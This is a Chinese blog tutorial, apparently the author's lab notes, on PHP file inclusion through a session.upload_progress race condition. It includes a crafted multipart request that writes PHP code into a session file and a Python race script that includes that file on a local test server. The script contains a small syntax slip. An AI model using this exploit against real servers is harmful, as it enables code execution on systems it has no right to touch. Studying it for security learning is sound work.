利用session.upload_progress执行文件包含

于 2024-08-27 18:11:07 发布
阅读量872 收藏 20
点赞数 6
文章标签: 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70638961/article/details/141605421
版权

1.session.upload_progress的作用:

        session.upload_progress最初是PHP为上传进度条设计的一个功能,在上传文件较大的情况下,PHP将进行流式上传,并将进度信息放在Session中(包含用户可控的值),即使此时用户没有初始化Session,PHP也会自动初始化Session。

        默认情况下,session.upload_progress是开启的,我们发送一下以下数据包,可见,我在上传文件的同时,POST了一个名为PHP_SESSION_UPLOAD_PROGRESS的字段,其值为。(PHP_SESSION_UPLOAD_PROGRESS是在php.ini里定义的session.upload_progress.name)只要上传包里带上这个键,PHP就会自动启用Session,又因为我在Cookie中设置了PHPSESSID=oupeng,所以Session文件将会自动创建。并且会生成由PHP_SESSION_UPLOAD_PROGRESS和<?php phpinfo(); ?>组成的文件内容。

POST /xss_location/include/session_upload.php HTTP/1.1
Host: 172.16.60.64
Content-Length: 347
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.16.60.64
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGmgITM0pPCAAzrsA
Cookie: PHPSESSID=oupeng
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.60.64/xss_location/include/session_upload.html
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryGmgITM0pPCAAzrsA
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

<?php phpinfo(); ?>
------WebKitFormBoundaryGmgITM0pPCAAzrsA
Content-Disposition: form-data; name="file"; filename="flag.txt"
Content-Type: text/plain

<?php phpinfo(); ?>aaaaaaaaaaaaa
------WebKitFormBoundaryGmgITM0pPCAAzrsA--

但是由于有session.upload_progress.cleanup的存在(默认是开启的),session会在被上传之后自动清除。

2.竞争

        为了解决这个问题,我们则需要竞争,在文件被清除前完成利用。所以我用到了一个python脚本。

import io
import requests
import threading

sessid = 'oupeng'


def t1(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        response = session.post(
            'http://127.0.0.1/include/demo.php',
            data={'PHP_SESSION_UPLOAD_PROGRESS': '<?=phpinfo()?>'},
            files={'file': ('a.txt', f)},
            cookies={'PHPSESSID': sessid}
        )


def t2(session):
    while True:
        response = session.get(f'http://127.0.0.1/include/1.php?file=C:/Study/phpstudy/phpstudy_pro/Extensions/tmp/tmp/sess_{sessid}'))
        print(response.text)


with requests.session() as session:
    t1 = threading.Thread(target=t1, args=(session,))
    t1.daemon = True
    t1.start()

    t2(session)

按理来说这个脚本是没什么问题的。

代码编写遇到的问题:
第一个问题:编码问题
 UnicodeEncodeError: 'gbk' codec can't encode character '\xe4' in position 82201: illegal multibyte sequence,

        就是在这里的gbk编码可能无法对某些unicode字符进行编码导致报错,所以我在t2进程的response对象设置为utf-8编码

但是发现还是有编码问题:

nicode 编码错误: 'gbk' codec can't encode character '\xe4' in position 82145: illegal multibyte sequence

所以我直接导入了一个sys.stdout模块,这个模块作用就是标准输出,我写的就是标准输出使用utf-8

第二个问题:找不到临时文件

就是在我脚本上面写的路径找不到临时文件

<br />
<b>Warning</b>:  include(C:/Study/phpstudy/phpstudy_pro/Extensions/tmp/tmp/sess_oupeng): failed to open stream: No such file or directory in <b>C:\Study\phpstudy\phpstudy_pro\WWW\include\1.php</b> on line <b>2</b><br />
<br />

 不知道是哪一步出了问题,所以我在t1进程打印一下服务器的响应内容,运行后返回的就是200,没有问题。

print(response.text)

然后我想起来php.ini配置文件里面的upload_tmp_dir我配置的是在windows/temp下面,不知道是否需要改成脚本的路径,所以我尝试改了后重新运行。

upload_tmp_dir = "C:/Study/phpstudy/phpstudy_pro/Extensions/tmp/tmp"

 最后是包含成功了。

 

竞争的第二种方法:

除了用脚本竞争,也可以用burpsuite同时开两个intruder进程,一个进程一直上传文件,一个进程用作包含文件,最后也可以完成文件包含。

这是包含的进程

 

 这是上传的进程

 可以发现包含成功了。

zengyu3139707847
关注
PHP基于session.upload_progress 实现文件上传进度显示功能详解
01-02
本文实例讲述了PHP基于session.upload_progress 实现文件上传进度显示功能。分享给大家供大家参考,具体如下: 介绍 session.upload_progress 是PHP5.4的新特征。 当 session.upload_progress.enabled INI 选项开启...
利用PHP_SESSION_UPLOAD_PROGRESS上传webshell
god_Zeo的安全博客
09-24 831
0x01 环境配置&利用条件 环境分析 session.use_strict_mode默认值为0,此时用户是可以自己定义Session ID的 我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag session.upload_progress.prefix由我们构造的session.upload_progress.name值组成,最后被写入sess_文件里。 所以: 这个文件名是PHPSESSID=flag,文件名
php-session文件包含和反序列化(对session.upload_progress利用)
unexpectedthing的博客
02-11 1694
文章目录前言session的简介PHP中session的存储方式php.ini中的一些配置php中的session.upload_progress文件包含反序列化$_SESSION变量直接可控$_SESSION变量不可控参考链接 前言 本文是利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含和反序列化的总结。 也就是关于php-session文件包含和反序列化 session的简介 session被称为“会话控制”,Session 对象存储特定用户会话所需的属性及配置信息。这样,当用
session.upload_progress进行文件包含和反序列化学习
snowlyzz的博客
09-07 491
利用session.upload_progress进行文件包含
session.upload_progress文件包含漏洞
leekos的博客,分享web安全相关知识~
06-02 662
之前学习了该漏洞,但是没有做笔记,导致容易遗忘。在此用一个题目来理解漏洞以下是session.upload_progress.enabled可以控制是否开启session.upload_progress功能session.upload_progress.cleanup可以控制是否在上传之后删除文件内容session.upload_progress.prefix可以设置上传文件内容中的前缀session.upload_progress.name的值即为session中的键值。
php上传完没进度条_php如何实现上传进度条
weixin_29027305的博客
03-08 148
php实现上传进度条的方法:首先向服务器端上传一个文件;然后用PHP将此次文件上传的详细信息存储在session当中;接着用Ajax周期性的请求一个服务器端脚本;最后通过浏览器端的Javascript显示更新进度条即可。实现文件上传进度条基本是依靠JS插件或HTML5的File API来完成,其实PHP配合ajax也能实现此功能。PHP手册对于session上传进度是这么介绍的:当 session...
PHP文件上传进度条插件js版 不需要修改php的session.upload-progress或安装额外的php模块等
08-16
一,插件名 UploadiFive 二,apache或iis等服务器.需要修改文件上传大小时间等限制 三,文件默认上传到网站根目录的/Uploads/exe_file/目录中 四,默认不修改文件名,所以,上传的文件,不得有空格,中文斜线等非法字符
PHP中使用Session配合Javascript实现文件上传进度条功能
10-25
- session.upload_progress.cleanup: 设置在文件上传请求完成提交后,是否清除session中的相关信息,默认值为1(开启)。 - session.upload_progress.prefix: 设置存储上传进度信息的session变量名前缀。 - session....
PHP使用Session实现上传进度功能详解
10-16
- `session.upload_progress.cleanup`:默认设置为1,表示文件上传完成后清理相关的session数据。 - `session.upload_progress.prefix`:定义session中存储上传进度信息的键的前缀。 - `session.upload_progress....
深入浅出带你学习利用session.upload_progress进行文件包含/深入浅出带你学习利用session.upload_progress进行文件包含_新手渗透自学
最新发布
程序员六七的博客
05-17 341
本文正在参加「金石计划 . 瓜分6万现金大奖」前言该思路是很久之前在CTF比赛中学习到的,可以简单理解为利用.来进行文件竞争从而达到上传文件进行文件包含或者命令执行的目的
uploadProgress上传显示进度条
08-27
uploadProgress上传显示进度条
7天入门php-文件上传进度
永远的北极光
10-04 974
获取文件上传进度的方法很多,该文介绍的是使用session.upload_progress,基于PHP 5.4以上版本的方法。 【1】文件php.ini 配置 根据实际情况进行设置 session.upload_progress.enabled[=1] : 是否启用上传进度报告(默认开启) session.upload_progress.cleanup[=1] : 是否在上传完
php7 uploadprogress,PHP基于session.upload_progress 实现文件上传进度显示功能详解
weixin_30209891的博客
03-12 315
本文实例讲述了PHP基于session.upload_progress 实现文件上传进度显示功能。分享给大家供大家参考,具体如下:介绍session.upload_progress 是PHP5.4的新特征。当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以...
session.upload_progress文件包含
Aiwin的博客
05-29 870
session.upload_progress文件包含
php通过session实现upload_progress
prape's world!
01-07 1160
在php中,显示上传文件进度有swf,apc,纯javascript等集中方法,而现在比较推荐的是利用php的session(PHP>5.4)实现,这里,我简单的记录一下。 相关资料可以参考php.net/manual/en/session.upload-progress.php,还是相对比较简单的,可以参考www.111cn.net/phper/php-cy/54314.htm这里的讲解,但是
sessionsession.upload_progress再认识
Monica的博客
10-25 1291
结合: WEB82-session文件包含 WEB263-session反序列化 进一步了解sessionsession.upload_progress知识 1、cleanup 只会清除session文件内容,不会清楚session文件 2、当页面使用ini_set修改php.ini文件的内容时,phpinfo()里面的local value内容也会修改 我们在脚本使用了ini_set('session.serialize_handler', 'php'); 而php.ini中.
-------已搬运------session.upload_progress。伪造session 反序列化 + 文件包含,,临时文件包含 ++ PHP7 的 segment fault
Zero_Adam的博客
05-01 734
目录:1. 在session反序列化,PHP解析器的考点中使用。2. 进行文件包含:!!!我发现了一个新的方法: 1. 在session反序列化,PHP解析器的考点中使用。 PHP反序列化之SEESSION反序列化(二):切入学习点:jarvis OJ PHPINFO. 这个是利用了当session.upload_progress.enabled开启时如果我们上传了一个和session.upload_progress.name同名的变量,也就是名字为PHP_SESSION_UPLOAD_PROGRESS的时
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值